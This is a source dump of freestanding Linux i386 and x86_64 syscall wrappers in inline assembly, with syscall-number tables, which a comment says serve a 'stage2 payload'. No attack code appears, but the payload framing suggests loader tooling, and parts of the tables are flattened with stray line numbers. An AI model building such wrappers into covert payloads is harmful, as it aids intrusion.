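 *  - Every statement declares a "memory" clobber. The kernel reads and
 *    writes caller memory behind the compiler's back (read() fills buf,
 *    execve() walks argv/envp, old_mmap() reads an argument block) and
 *    without the clobber the compiler may cache or reorder loads and
 *    stores around the trap. The x86_64 wrappers already declare it.
 *  - The ebx operand uses the single-letter constraint "b". The former
 *    "bx" spelling lists two alternatives, ebx or an SSE register, and
 *    only the first is a valid syscall argument register.
 */

/* read(2): returns the byte count, 0 at EOF, or -errno. */
ssize_t _read(int fd, void *buf, size_t size)
{
    ssize_t ret;
    asm volatile
    (
        "int $0x80"
        : "=a" (ret)
        : "0"(__NR_read), "b"(fd), "c"(buf), "d"(size)
        : "memory"
    );
    return ret;
}

/* write(2): returns the byte count written or -errno. */
ssize_t _write(int fd, const void *buf, size_t size)
{
    ssize_t ret;
    asm volatile
    (
        "int $0x80"
        : "=a" (ret)
        : "0"(__NR_write), "b"(fd), "c"(buf), "d"(size)
        : "memory"
    );
    return ret;
}

/*
 * open(2): path in ebx, second argument in ecx, third in edx.
 * NOTE(review): open(2) takes (path, flags, mode) in that order, so the
 * parameter names `mode`/`flags` look swapped relative to what ecx/edx
 * carry. They are kept unchanged so existing callers are unaffected --
 * confirm against the call sites in main.c that the O_* flags are passed
 * as the second argument.
 * Returns the new fd or -errno.
 */
int _open(char *path, int mode, int flags)
{
    long ret;

    asm volatile
    (
        "int $0x80"
        : "=a" (ret)
        : "0"(__NR_open), "b"(path), "c"(mode), "d"(flags)
        : "memory"
    );
    return ret;
}

/* close(2): returns 0 or -errno. */
int _close(int fd)
{
    long ret;

    asm volatile
    (
        "int $0x80"
        : "=a" (ret)
        : "0"(__NR_close), "b"(fd)
        : "memory"
    );
    return ret;
}

/* lseek(2) (32-bit offset variant, __NR_lseek): new offset or -errno. */
long _lseek(int fd, long offset, int whence)
{
    long ret;

    asm volatile
    (
        "int $0x80"
        : "=a" (ret)
        : "0"(__NR_lseek), "b"(fd), "c"(offset), "d"(whence)
        : "memory"
    );
    return ret;
}

/*
 * mmap via the legacy i386 __NR_mmap (old_mmap) entry, which takes a
 * single pointer in ebx to a block of six unsigned longs: addr, len,
 * prot, flags, fd, offset (byte offset, not pages).
 *
 * The block is built explicitly here. The previous version passed
 * &start and relied on the six parameters occupying consecutive stack
 * slots -- something cdecl happens to arrange at the call but nothing
 * guarantees once the compiler spills, reorders or register-passes
 * arguments -- and carried an unused `ebp` register variable left over
 * from an mmap2-style attempt.
 *
 * Returns the mapped address, or -errno cast to a pointer: callers must
 * test (unsigned long)ret > -4096UL to detect failure.
 */
void * _mmap(void * start, long length, int prot, int flags, int fd, long offset)
{
    unsigned long args[6];
    void * ret;

    args[0] = (unsigned long) start;
    args[1] = (unsigned long) length;
    args[2] = (unsigned long) prot;
    args[3] = (unsigned long) flags;
    args[4] = (unsigned long) fd;
    args[5] = (unsigned long) offset;

    asm volatile
    (
        "int $0x80"
        : "=a" (ret)
        : "0"(__NR_mmap), "b"(args)
        : "memory"
    );
    return ret;
}

/* mprotect(2): returns 0 or -errno. */
long _mprotect(void * addr, long len, int prot)
{
    long ret;

    asm volatile
    (
        "int $0x80"
        : "=a" (ret)
        : "0"(__NR_mprotect), "b"(addr), "c"(len), "d"(prot)
        : "memory"
    );
    return ret;
}

/* munmap(2): returns 0 or -errno. */
long _munmap(char * start, int length)
{
    long ret;

    asm volatile
    (
        "int $0x80"
        : "=a" (ret)
        : "0"(__NR_munmap), "b"(start), "c"(length)
        : "memory"
    );
    return ret;
}

/* brk(2): returns the new (or, on failure, the unchanged current) break. */
long _brk(unsigned long addr)
{
    long ret;

    asm volatile
    (
        "int $0x80"
        : "=a" (ret)
        : "0"(__NR_brk), "b"(addr)
        : "memory"
    );

    return ret;
}

/* exit(2): terminates the calling thread; the return is never reached
 * in practice and only exists for source compatibility. */
long _exit(int level)
{
    long ret;

    asm volatile
    (
        "int $0x80"
        : "=a" (ret)
        : "0"(__NR_exit), "b"(level)
        : "memory"
    );
    return (ret);
}

/* execve(2): only returns on failure, with -errno. argv/envp must be
 * NULL-terminated arrays. */
long _execve(char * filename, char ** argv, char ** envp)
{
    long ret;

    asm volatile
    (
        "int $0x80"
        : "=a" (ret)
        : "0"(__NR_execve), "b"(filename), "c"(argv), "d"(envp)
        : "memory"
    );
    return ret;
}
--------------------------------------------------------------------------------
/stage2/syscall_x86.h:
--------------------------------------------------------------------------------
#ifndef _ASM_X86_UNISTD_32_H
#define _ASM_X86_UNISTD_32_H 1

#define __NR_restart_syscall 0
#define __NR_exit 1
#define __NR_fork 2
#define __NR_read 3
#define __NR_write 4
#define __NR_open 5
#define __NR_close 6
#define __NR_waitpid 7
#define __NR_creat 8
#define __NR_link 9
#define __NR_unlink 10
#define __NR_execve 11
#define __NR_chdir 12
#define __NR_time 13
#define __NR_mknod 14
#define __NR_chmod 15
#define __NR_lchown 16
#define __NR_break 17
#define __NR_oldstat 18
#define __NR_lseek 19
#define __NR_getpid 20
#define __NR_mount 21
#define __NR_umount 22
#define __NR_setuid 23
#define __NR_getuid 24
#define __NR_stime 25
#define __NR_ptrace 26
#define __NR_alarm 27
#define __NR_oldfstat 28
#define __NR_pause 29
#define __NR_utime 30
#define __NR_stty 31
#define __NR_gtty 32
#define __NR_access 33
#define __NR_nice 34
#define __NR_ftime 35
#define __NR_sync 36
#define __NR_kill 37
#define __NR_rename 38
#define __NR_mkdir 39
#define __NR_rmdir 40
#define __NR_dup 41
#define __NR_pipe 42
#define __NR_times 43
#define __NR_prof 44
#define __NR_brk 45
#define __NR_setgid 46
#define __NR_getgid 47
#define __NR_signal 48
#define __NR_geteuid 49
#define __NR_getegid 50
#define __NR_acct 51
#define __NR_umount2 52
#define __NR_lock 53
#define __NR_ioctl 54
#define __NR_fcntl 55
#define __NR_mpx 56
#define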
__NR_setpgid 57 62 | #define __NR_ulimit 58 63 | #define __NR_oldolduname 59 64 | #define __NR_umask 60 65 | #define __NR_chroot 61 66 | #define __NR_ustat 62 67 | #define __NR_dup2 63 68 | #define __NR_getppid 64 69 | #define __NR_getpgrp 65 70 | #define __NR_setsid 66 71 | #define __NR_sigaction 67 72 | #define __NR_sgetmask 68 73 | #define __NR_ssetmask 69 74 | #define __NR_setreuid 70 75 | #define __NR_setregid 71 76 | #define __NR_sigsuspend 72 77 | #define __NR_sigpending 73 78 | #define __NR_sethostname 74 79 | #define __NR_setrlimit 75 80 | #define __NR_getrlimit 76 81 | #define __NR_getrusage 77 82 | #define __NR_gettimeofday 78 83 | #define __NR_settimeofday 79 84 | #define __NR_getgroups 80 85 | #define __NR_setgroups 81 86 | #define __NR_select 82 87 | #define __NR_symlink 83 88 | #define __NR_oldlstat 84 89 | #define __NR_readlink 85 90 | #define __NR_uselib 86 91 | #define __NR_swapon 87 92 | #define __NR_reboot 88 93 | #define __NR_readdir 89 94 | #define __NR_mmap 90 95 | #define __NR_munmap 91 96 | #define __NR_truncate 92 97 | #define __NR_ftruncate 93 98 | #define __NR_fchmod 94 99 | #define __NR_fchown 95 100 | #define __NR_getpriority 96 101 | #define __NR_setpriority 97 102 | #define __NR_profil 98 103 | #define __NR_statfs 99 104 | #define __NR_fstatfs 100 105 | #define __NR_ioperm 101 106 | #define __NR_socketcall 102 107 | #define __NR_syslog 103 108 | #define __NR_setitimer 104 109 | #define __NR_getitimer 105 110 | #define __NR_stat 106 111 | #define __NR_lstat 107 112 | #define __NR_fstat 108 113 | #define __NR_olduname 109 114 | #define __NR_iopl 110 115 | #define __NR_vhangup 111 116 | #define __NR_idle 112 117 | #define __NR_vm86old 113 118 | #define __NR_wait4 114 119 | #define __NR_swapoff 115 120 | #define __NR_sysinfo 116 121 | #define __NR_ipc 117 122 | #define __NR_fsync 118 123 | #define __NR_sigreturn 119 124 | #define __NR_clone 120 125 | #define __NR_setdomainname 121 126 | #define __NR_uname 122 127 | #define 
__NR_modify_ldt 123 128 | #define __NR_adjtimex 124 129 | #define __NR_mprotect 125 130 | #define __NR_sigprocmask 126 131 | #define __NR_create_module 127 132 | #define __NR_init_module 128 133 | #define __NR_delete_module 129 134 | #define __NR_get_kernel_syms 130 135 | #define __NR_quotactl 131 136 | #define __NR_getpgid 132 137 | #define __NR_fchdir 133 138 | #define __NR_bdflush 134 139 | #define __NR_sysfs 135 140 | #define __NR_personality 136 141 | #define __NR_afs_syscall 137 142 | #define __NR_setfsuid 138 143 | #define __NR_setfsgid 139 144 | #define __NR__llseek 140 145 | #define __NR_getdents 141 146 | #define __NR__newselect 142 147 | #define __NR_flock 143 148 | #define __NR_msync 144 149 | #define __NR_readv 145 150 | #define __NR_writev 146 151 | #define __NR_getsid 147 152 | #define __NR_fdatasync 148 153 | #define __NR__sysctl 149 154 | #define __NR_mlock 150 155 | #define __NR_munlock 151 156 | #define __NR_mlockall 152 157 | #define __NR_munlockall 153 158 | #define __NR_sched_setparam 154 159 | #define __NR_sched_getparam 155 160 | #define __NR_sched_setscheduler 156 161 | #define __NR_sched_getscheduler 157 162 | #define __NR_sched_yield 158 163 | #define __NR_sched_get_priority_max 159 164 | #define __NR_sched_get_priority_min 160 165 | #define __NR_sched_rr_get_interval 161 166 | #define __NR_nanosleep 162 167 | #define __NR_mremap 163 168 | #define __NR_setresuid 164 169 | #define __NR_getresuid 165 170 | #define __NR_vm86 166 171 | #define __NR_query_module 167 172 | #define __NR_poll 168 173 | #define __NR_nfsservctl 169 174 | #define __NR_setresgid 170 175 | #define __NR_getresgid 171 176 | #define __NR_prctl 172 177 | #define __NR_rt_sigreturn 173 178 | #define __NR_rt_sigaction 174 179 | #define __NR_rt_sigprocmask 175 180 | #define __NR_rt_sigpending 176 181 | #define __NR_rt_sigtimedwait 177 182 | #define __NR_rt_sigqueueinfo 178 183 | #define __NR_rt_sigsuspend 179 184 | #define __NR_pread64 180 185 | #define __NR_pwrite64 181 186 
| #define __NR_chown 182 187 | #define __NR_getcwd 183 188 | #define __NR_capget 184 189 | #define __NR_capset 185 190 | #define __NR_sigaltstack 186 191 | #define __NR_sendfile 187 192 | #define __NR_getpmsg 188 193 | #define __NR_putpmsg 189 194 | #define __NR_vfork 190 195 | #define __NR_ugetrlimit 191 196 | #define __NR_mmap2 192 197 | #define __NR_truncate64 193 198 | #define __NR_ftruncate64 194 199 | #define __NR_stat64 195 200 | #define __NR_lstat64 196 201 | #define __NR_fstat64 197 202 | #define __NR_lchown32 198 203 | #define __NR_getuid32 199 204 | #define __NR_getgid32 200 205 | #define __NR_geteuid32 201 206 | #define __NR_getegid32 202 207 | #define __NR_setreuid32 203 208 | #define __NR_setregid32 204 209 | #define __NR_getgroups32 205 210 | #define __NR_setgroups32 206 211 | #define __NR_fchown32 207 212 | #define __NR_setresuid32 208 213 | #define __NR_getresuid32 209 214 | #define __NR_setresgid32 210 215 | #define __NR_getresgid32 211 216 | #define __NR_chown32 212 217 | #define __NR_setuid32 213 218 | #define __NR_setgid32 214 219 | #define __NR_setfsuid32 215 220 | #define __NR_setfsgid32 216 221 | #define __NR_pivot_root 217 222 | #define __NR_mincore 218 223 | #define __NR_madvise 219 224 | #define __NR_getdents64 220 225 | #define __NR_fcntl64 221 226 | #define __NR_gettid 224 227 | #define __NR_readahead 225 228 | #define __NR_setxattr 226 229 | #define __NR_lsetxattr 227 230 | #define __NR_fsetxattr 228 231 | #define __NR_getxattr 229 232 | #define __NR_lgetxattr 230 233 | #define __NR_fgetxattr 231 234 | #define __NR_listxattr 232 235 | #define __NR_llistxattr 233 236 | #define __NR_flistxattr 234 237 | #define __NR_removexattr 235 238 | #define __NR_lremovexattr 236 239 | #define __NR_fremovexattr 237 240 | #define __NR_tkill 238 241 | #define __NR_sendfile64 239 242 | #define __NR_futex 240 243 | #define __NR_sched_setaffinity 241 244 | #define __NR_sched_getaffinity 242 245 | #define __NR_set_thread_area 243 246 | #define 
__NR_get_thread_area 244 247 | #define __NR_io_setup 245 248 | #define __NR_io_destroy 246 249 | #define __NR_io_getevents 247 250 | #define __NR_io_submit 248 251 | #define __NR_io_cancel 249 252 | #define __NR_fadvise64 250 253 | #define __NR_exit_group 252 254 | #define __NR_lookup_dcookie 253 255 | #define __NR_epoll_create 254 256 | #define __NR_epoll_ctl 255 257 | #define __NR_epoll_wait 256 258 | #define __NR_remap_file_pages 257 259 | #define __NR_set_tid_address 258 260 | #define __NR_timer_create 259 261 | #define __NR_timer_settime 260 262 | #define __NR_timer_gettime 261 263 | #define __NR_timer_getoverrun 262 264 | #define __NR_timer_delete 263 265 | #define __NR_clock_settime 264 266 | #define __NR_clock_gettime 265 267 | #define __NR_clock_getres 266 268 | #define __NR_clock_nanosleep 267 269 | #define __NR_statfs64 268 270 | #define __NR_fstatfs64 269 271 | #define __NR_tgkill 270 272 | #define __NR_utimes 271 273 | #define __NR_fadvise64_64 272 274 | #define __NR_vserver 273 275 | #define __NR_mbind 274 276 | #define __NR_get_mempolicy 275 277 | #define __NR_set_mempolicy 276 278 | #define __NR_mq_open 277 279 | #define __NR_mq_unlink 278 280 | #define __NR_mq_timedsend 279 281 | #define __NR_mq_timedreceive 280 282 | #define __NR_mq_notify 281 283 | #define __NR_mq_getsetattr 282 284 | #define __NR_kexec_load 283 285 | #define __NR_waitid 284 286 | #define __NR_add_key 286 287 | #define __NR_request_key 287 288 | #define __NR_keyctl 288 289 | #define __NR_ioprio_set 289 290 | #define __NR_ioprio_get 290 291 | #define __NR_inotify_init 291 292 | #define __NR_inotify_add_watch 292 293 | #define __NR_inotify_rm_watch 293 294 | #define __NR_migrate_pages 294 295 | #define __NR_openat 295 296 | #define __NR_mkdirat 296 297 | #define __NR_mknodat 297 298 | #define __NR_fchownat 298 299 | #define __NR_futimesat 299 300 | #define __NR_fstatat64 300 301 | #define __NR_unlinkat 301 302 | #define __NR_renameat 302 303 | #define __NR_linkat 303 304 | #define 
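__NR_symlinkat 304
#define __NR_readlinkat 305
#define __NR_fchmodat 306
#define __NR_faccessat 307
#define __NR_pselect6 308
#define __NR_ppoll 309
#define __NR_unshare 310
#define __NR_set_robust_list 311
#define __NR_get_robust_list 312
#define __NR_splice 313
#define __NR_sync_file_range 314
#define __NR_tee 315
#define __NR_vmsplice 316
#define __NR_move_pages 317
#define __NR_getcpu 318
#define __NR_epoll_pwait 319
#define __NR_utimensat 320
#define __NR_signalfd 321
#define __NR_timerfd_create 322
#define __NR_eventfd 323
#define __NR_fallocate 324
#define __NR_timerfd_settime 325
#define __NR_timerfd_gettime 326
#define __NR_signalfd4 327
#define __NR_eventfd2 328
#define __NR_epoll_create1 329
#define __NR_dup3 330
#define __NR_pipe2 331
#define __NR_inotify_init1 332
#define __NR_preadv 333
#define __NR_pwritev 334
#define __NR_rt_tgsigqueueinfo 335
#define __NR_perf_event_open 336
#define __NR_recvmmsg 337
#define __NR_fanotify_init 338
#define __NR_fanotify_mark 339
#define __NR_prlimit64 340
#define __NR_name_to_handle_at 341
#define __NR_open_by_handle_at 342
#define __NR_clock_adjtime 343
#define __NR_syncfs 344
#define __NR_sendmmsg 345
#define __NR_setns 346
#define __NR_process_vm_readv 347
#define __NR_process_vm_writev 348
#define __NR_kcmp 349
#define __NR_finit_module 350
#define __NR_sched_setattr 351
#define __NR_sched_getattr 352
#define __NR_renameat2 353
#define __NR_memfd_create 356

#endif /* _ASM_X86_UNISTD_32_H */
--------------------------------------------------------------------------------
/stage2/syscall_x86_64.c:
--------------------------------------------------------------------------------
#include "syscall_x86_64.h"
#include "linuxdefs.h"

/*
 * Raw Linux/x86_64 syscall wrappers for the stage2 payload (freestanding,
 * no libc).
 *
 * Convention used by every wrapper in this file: syscall number in rax,
 * arguments in rdi, rsi, rdx, r10, r8, r9, "syscall" traps into the
 * kernel, which clobbers rcx and r11 and returns the raw result in rax:
 * >= 0 on success, -errno on failure (no errno variable here, callers
 * test the sign).
 *
 * Every asm statement declares "cc", "rcx", "r11" and "memory" clobbers:
 * the kernel reads and writes caller memory behind the compiler's back
 * (read() fills buf, execve() walks argv/envp), so loads and stores must
 * not be cached or reordered around the trap.
 */

/* read(2): returns the byte count, 0 at EOF, or -errno. */
ssize_t _read(int fd, void *buf, size_t size)
{
    ssize_t ret;
    asm volatile
    (
        "syscall"
        : "=a" (ret)
        : "0"(__NR_read), "D"(fd), "S"(buf), "d"(size)
        : "cc", "rcx", "r11", "memory"
    );
    return ret;
}


/* write(2): returns the byte count written or -errno. */
ssize_t _write(int fd, const void *buf, size_t size)
{
    ssize_t ret;
    asm volatile
    (
        "syscall"
        : "=a" (ret)
        : "0"(__NR_write), "D"(fd), "S"(buf), "d"(size)
        : "cc", "rcx", "r11", "memory"
    );
    return ret;
}

/*
 * open(2): path in rdi, second argument in rsi, third in rdx.
 * NOTE(review): open(2) takes (path, flags, mode) in that order, so the
 * parameter names `mode`/`flags` look swapped relative to what rsi/rdx
 * carry. They are kept unchanged so existing callers are unaffected --
 * confirm against the call sites in main.c that the O_* flags are passed
 * as the second argument.
 * Returns the new fd or -errno.
 */
int _open(char *path, int mode, int flags)
{
    long ret;

    asm volatile
    (
        "syscall"
        : "=a" (ret)
        : "0"(__NR_open), "D"(path), "S"(mode), "d"(flags)
        : "cc", "rcx", "r11", "memory"
    );
    return ret;
}

/* close(2): returns 0 or -errno. */
int _close(int fd)
{
    long ret;

    asm volatile
    (
        "syscall"
        : "=a" (ret)
        : "0"(__NR_close), "D"(fd)
        : "cc", "rcx", "r11", "memory"
    );
    return ret;
}

/* lseek(2): returns the new offset or -errno. */
long _lseek(int fd, long offset, int whence)
{
    long ret;

    asm volatile
    (
        "syscall"
        : "=a" (ret)
        : "0"(__NR_lseek), "D"(fd), "S"(offset), "d"(whence)
        : "cc", "rcx", "r11", "memory"
    );
    return ret;
}

/*
 * mmap(2): the 4th-6th arguments travel in r10, r8 and r9, which have no
 * single-letter constraint letter, so they are bound through explicit
 * register variables.
 *
 * The register variables are declared long (register width). The previous
 * `register int r9 = offset` silently truncated the 64-bit `offset` to 32
 * bits, so any file offset at or above 2 GiB was mapped at the wrong
 * position; `flags` and `fd` are widened the same way for uniformity.
 *
 * Returns the mapped address, or -errno cast to a pointer: callers must
 * test (unsigned long)ret > -4096UL to detect failure.
 */
void * _mmap(void * start, long length, int prot, int flags, int fd, long offset)
{
    register long r10 asm("r10") = flags;
    register long r8 asm("r8") = fd;
    register long r9 asm("r9") = offset;
    void * ret = 0;

    asm volatile
    (
        "syscall"
        : "=a" (ret)
        : "0"(__NR_mmap), "D"(start), "S"(length), "d"(prot), "r"(r10), "r"(r8), "r"(r9)
        : "cc", "rcx", "r11", "memory"
    );

    return ret;
}

/* mprotect(2): returns 0 or -errno. */
long _mprotect(void * addr, long len, int prot)
{
    long ret;

    asm volatile
    (
        "syscall"
        : "=a" (ret)
        : "0"(__NR_mprotect), "D"(addr), "S"(len), "d"(prot)
        : "cc", "rcx", "r11", "memory"
    );
    return ret;
}

/* munmap(2): returns 0 or -errno. */
long _munmap(char * start, int length)
{
    long ret;

    asm volatile
    (
        "syscall"
        : "=a" (ret)
        : "0"(__NR_munmap), "D"(start), "S"(length)
        : "cc", "rcx", "r11", "memory"
    );
    return ret;
}

/* brk(2): returns the new (or, on failure, the unchanged current) break. */
long _brk(unsigned long addr)
{
    long ret;

    asm volatile
    (
        "syscall"
        : "=a" (ret)
        : "0"(__NR_brk), "D"(addr)
        : "cc", "rcx", "r11", "memory"
    );

    return ret;
}

/* exit(2): terminates the calling thread; the return is never reached
 * in practice and only exists for source compatibility. */
int _exit(int level)
{
    long ret;

    asm volatile
    (
        "syscall"
        : "=a" (ret)
        : "0"(__NR_exit), "D"(level)
        : "cc", "rcx", "r11", "memory"
    );
    return (ret);
}

/* execve(2): only returns on failure, with -errno. argv/envp must be
 * NULL-terminated arrays. */
long _execve(char * filename, char ** argv, char ** envp)
{
    long ret;

    asm volatile
    (
        "syscall"
        : "=a" (ret)
        : "0"(__NR_execve), "D"(filename), "S"(argv), "d"(envp)
        : "cc", "rcx", "r11", "memory"
    );
    return ret;
}
--------------------------------------------------------------------------------
/stage2/syscall_x86_64.h:
--------------------------------------------------------------------------------
#ifndef _ASM_X86_UNISTD_64_H
#define _ASM_X86_UNISTD_64_H 1

#define __NR_read 0
#define __NR_write 1
#define __NR_open 2
#define __NR_close 3
#define __NR_stat 4
#define __NR_fstat 5
#define __NR_lstat 6
#define __NR_poll 7
#define __NR_lseek 8
#define __NR_mmap 9
#define __NR_mprotect 10
#define __NR_munmap 11
#define __NR_brk 12
#define __NR_rt_sigaction 13
#define __NR_rt_sigprocmask 14
#define __NR_rt_sigreturn 15
#define __NR_ioctl 16
#define __NR_pread64 17
#define __NR_pwrite64 18
#define __NR_readv 19
#define __NR_writev 20
#define __NR_access 21
#define __NR_pipe 22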
#define __NR_select 23 28 | #define __NR_sched_yield 24 29 | #define __NR_mremap 25 30 | #define __NR_msync 26 31 | #define __NR_mincore 27 32 | #define __NR_madvise 28 33 | #define __NR_shmget 29 34 | #define __NR_shmat 30 35 | #define __NR_shmctl 31 36 | #define __NR_dup 32 37 | #define __NR_dup2 33 38 | #define __NR_pause 34 39 | #define __NR_nanosleep 35 40 | #define __NR_getitimer 36 41 | #define __NR_alarm 37 42 | #define __NR_setitimer 38 43 | #define __NR_getpid 39 44 | #define __NR_sendfile 40 45 | #define __NR_socket 41 46 | #define __NR_connect 42 47 | #define __NR_accept 43 48 | #define __NR_sendto 44 49 | #define __NR_recvfrom 45 50 | #define __NR_sendmsg 46 51 | #define __NR_recvmsg 47 52 | #define __NR_shutdown 48 53 | #define __NR_bind 49 54 | #define __NR_listen 50 55 | #define __NR_getsockname 51 56 | #define __NR_getpeername 52 57 | #define __NR_socketpair 53 58 | #define __NR_setsockopt 54 59 | #define __NR_getsockopt 55 60 | #define __NR_clone 56 61 | #define __NR_fork 57 62 | #define __NR_vfork 58 63 | #define __NR_execve 59 64 | #define __NR_exit 60 65 | #define __NR_wait4 61 66 | #define __NR_kill 62 67 | #define __NR_uname 63 68 | #define __NR_semget 64 69 | #define __NR_semop 65 70 | #define __NR_semctl 66 71 | #define __NR_shmdt 67 72 | #define __NR_msgget 68 73 | #define __NR_msgsnd 69 74 | #define __NR_msgrcv 70 75 | #define __NR_msgctl 71 76 | #define __NR_fcntl 72 77 | #define __NR_flock 73 78 | #define __NR_fsync 74 79 | #define __NR_fdatasync 75 80 | #define __NR_truncate 76 81 | #define __NR_ftruncate 77 82 | #define __NR_getdents 78 83 | #define __NR_getcwd 79 84 | #define __NR_chdir 80 85 | #define __NR_fchdir 81 86 | #define __NR_rename 82 87 | #define __NR_mkdir 83 88 | #define __NR_rmdir 84 89 | #define __NR_creat 85 90 | #define __NR_link 86 91 | #define __NR_unlink 87 92 | #define __NR_symlink 88 93 | #define __NR_readlink 89 94 | #define __NR_chmod 90 95 | #define __NR_fchmod 91 96 | #define __NR_chown 92 97 | #define 
__NR_fchown 93 98 | #define __NR_lchown 94 99 | #define __NR_umask 95 100 | #define __NR_gettimeofday 96 101 | #define __NR_getrlimit 97 102 | #define __NR_getrusage 98 103 | #define __NR_sysinfo 99 104 | #define __NR_times 100 105 | #define __NR_ptrace 101 106 | #define __NR_getuid 102 107 | #define __NR_syslog 103 108 | #define __NR_getgid 104 109 | #define __NR_setuid 105 110 | #define __NR_setgid 106 111 | #define __NR_geteuid 107 112 | #define __NR_getegid 108 113 | #define __NR_setpgid 109 114 | #define __NR_getppid 110 115 | #define __NR_getpgrp 111 116 | #define __NR_setsid 112 117 | #define __NR_setreuid 113 118 | #define __NR_setregid 114 119 | #define __NR_getgroups 115 120 | #define __NR_setgroups 116 121 | #define __NR_setresuid 117 122 | #define __NR_getresuid 118 123 | #define __NR_setresgid 119 124 | #define __NR_getresgid 120 125 | #define __NR_getpgid 121 126 | #define __NR_setfsuid 122 127 | #define __NR_setfsgid 123 128 | #define __NR_getsid 124 129 | #define __NR_capget 125 130 | #define __NR_capset 126 131 | #define __NR_rt_sigpending 127 132 | #define __NR_rt_sigtimedwait 128 133 | #define __NR_rt_sigqueueinfo 129 134 | #define __NR_rt_sigsuspend 130 135 | #define __NR_sigaltstack 131 136 | #define __NR_utime 132 137 | #define __NR_mknod 133 138 | #define __NR_uselib 134 139 | #define __NR_personality 135 140 | #define __NR_ustat 136 141 | #define __NR_statfs 137 142 | #define __NR_fstatfs 138 143 | #define __NR_sysfs 139 144 | #define __NR_getpriority 140 145 | #define __NR_setpriority 141 146 | #define __NR_sched_setparam 142 147 | #define __NR_sched_getparam 143 148 | #define __NR_sched_setscheduler 144 149 | #define __NR_sched_getscheduler 145 150 | #define __NR_sched_get_priority_max 146 151 | #define __NR_sched_get_priority_min 147 152 | #define __NR_sched_rr_get_interval 148 153 | #define __NR_mlock 149 154 | #define __NR_munlock 150 155 | #define __NR_mlockall 151 156 | #define __NR_munlockall 152 157 | #define __NR_vhangup 153 158 | 
#define __NR_modify_ldt 154 159 | #define __NR_pivot_root 155 160 | #define __NR__sysctl 156 161 | #define __NR_prctl 157 162 | #define __NR_arch_prctl 158 163 | #define __NR_adjtimex 159 164 | #define __NR_setrlimit 160 165 | #define __NR_chroot 161 166 | #define __NR_sync 162 167 | #define __NR_acct 163 168 | #define __NR_settimeofday 164 169 | #define __NR_mount 165 170 | #define __NR_umount2 166 171 | #define __NR_swapon 167 172 | #define __NR_swapoff 168 173 | #define __NR_reboot 169 174 | #define __NR_sethostname 170 175 | #define __NR_setdomainname 171 176 | #define __NR_iopl 172 177 | #define __NR_ioperm 173 178 | #define __NR_create_module 174 179 | #define __NR_init_module 175 180 | #define __NR_delete_module 176 181 | #define __NR_get_kernel_syms 177 182 | #define __NR_query_module 178 183 | #define __NR_quotactl 179 184 | #define __NR_nfsservctl 180 185 | #define __NR_getpmsg 181 186 | #define __NR_putpmsg 182 187 | #define __NR_afs_syscall 183 188 | #define __NR_tuxcall 184 189 | #define __NR_security 185 190 | #define __NR_gettid 186 191 | #define __NR_readahead 187 192 | #define __NR_setxattr 188 193 | #define __NR_lsetxattr 189 194 | #define __NR_fsetxattr 190 195 | #define __NR_getxattr 191 196 | #define __NR_lgetxattr 192 197 | #define __NR_fgetxattr 193 198 | #define __NR_listxattr 194 199 | #define __NR_llistxattr 195 200 | #define __NR_flistxattr 196 201 | #define __NR_removexattr 197 202 | #define __NR_lremovexattr 198 203 | #define __NR_fremovexattr 199 204 | #define __NR_tkill 200 205 | #define __NR_time 201 206 | #define __NR_futex 202 207 | #define __NR_sched_setaffinity 203 208 | #define __NR_sched_getaffinity 204 209 | #define __NR_set_thread_area 205 210 | #define __NR_io_setup 206 211 | #define __NR_io_destroy 207 212 | #define __NR_io_getevents 208 213 | #define __NR_io_submit 209 214 | #define __NR_io_cancel 210 215 | #define __NR_get_thread_area 211 216 | #define __NR_lookup_dcookie 212 217 | #define __NR_epoll_create 213 218 | 
#define __NR_epoll_ctl_old 214 219 | #define __NR_epoll_wait_old 215 220 | #define __NR_remap_file_pages 216 221 | #define __NR_getdents64 217 222 | #define __NR_set_tid_address 218 223 | #define __NR_restart_syscall 219 224 | #define __NR_semtimedop 220 225 | #define __NR_fadvise64 221 226 | #define __NR_timer_create 222 227 | #define __NR_timer_settime 223 228 | #define __NR_timer_gettime 224 229 | #define __NR_timer_getoverrun 225 230 | #define __NR_timer_delete 226 231 | #define __NR_clock_settime 227 232 | #define __NR_clock_gettime 228 233 | #define __NR_clock_getres 229 234 | #define __NR_clock_nanosleep 230 235 | #define __NR_exit_group 231 236 | #define __NR_epoll_wait 232 237 | #define __NR_epoll_ctl 233 238 | #define __NR_tgkill 234 239 | #define __NR_utimes 235 240 | #define __NR_vserver 236 241 | #define __NR_mbind 237 242 | #define __NR_set_mempolicy 238 243 | #define __NR_get_mempolicy 239 244 | #define __NR_mq_open 240 245 | #define __NR_mq_unlink 241 246 | #define __NR_mq_timedsend 242 247 | #define __NR_mq_timedreceive 243 248 | #define __NR_mq_notify 244 249 | #define __NR_mq_getsetattr 245 250 | #define __NR_kexec_load 246 251 | #define __NR_waitid 247 252 | #define __NR_add_key 248 253 | #define __NR_request_key 249 254 | #define __NR_keyctl 250 255 | #define __NR_ioprio_set 251 256 | #define __NR_ioprio_get 252 257 | #define __NR_inotify_init 253 258 | #define __NR_inotify_add_watch 254 259 | #define __NR_inotify_rm_watch 255 260 | #define __NR_migrate_pages 256 261 | #define __NR_openat 257 262 | #define __NR_mkdirat 258 263 | #define __NR_mknodat 259 264 | #define __NR_fchownat 260 265 | #define __NR_futimesat 261 266 | #define __NR_newfstatat 262 267 | #define __NR_unlinkat 263 268 | #define __NR_renameat 264 269 | #define __NR_linkat 265 270 | #define __NR_symlinkat 266 271 | #define __NR_readlinkat 267 272 | #define __NR_fchmodat 268 273 | #define __NR_faccessat 269 274 | #define __NR_pselect6 270 275 | #define __NR_ppoll 271 276 | 
#define __NR_unshare 272 277 | #define __NR_set_robust_list 273 278 | #define __NR_get_robust_list 274 279 | #define __NR_splice 275 280 | #define __NR_tee 276 281 | #define __NR_sync_file_range 277 282 | #define __NR_vmsplice 278 283 | #define __NR_move_pages 279 284 | #define __NR_utimensat 280 285 | #define __NR_epoll_pwait 281 286 | #define __NR_signalfd 282 287 | #define __NR_timerfd_create 283 288 | #define __NR_eventfd 284 289 | #define __NR_fallocate 285 290 | #define __NR_timerfd_settime 286 291 | #define __NR_timerfd_gettime 287 292 | #define __NR_accept4 288 293 | #define __NR_signalfd4 289 294 | #define __NR_eventfd2 290 295 | #define __NR_epoll_create1 291 296 | #define __NR_dup3 292 297 | #define __NR_pipe2 293 298 | #define __NR_inotify_init1 294 299 | #define __NR_preadv 295 300 | #define __NR_pwritev 296 301 | #define __NR_rt_tgsigqueueinfo 297 302 | #define __NR_perf_event_open 298 303 | #define __NR_recvmmsg 299 304 | #define __NR_fanotify_init 300 305 | #define __NR_fanotify_mark 301 306 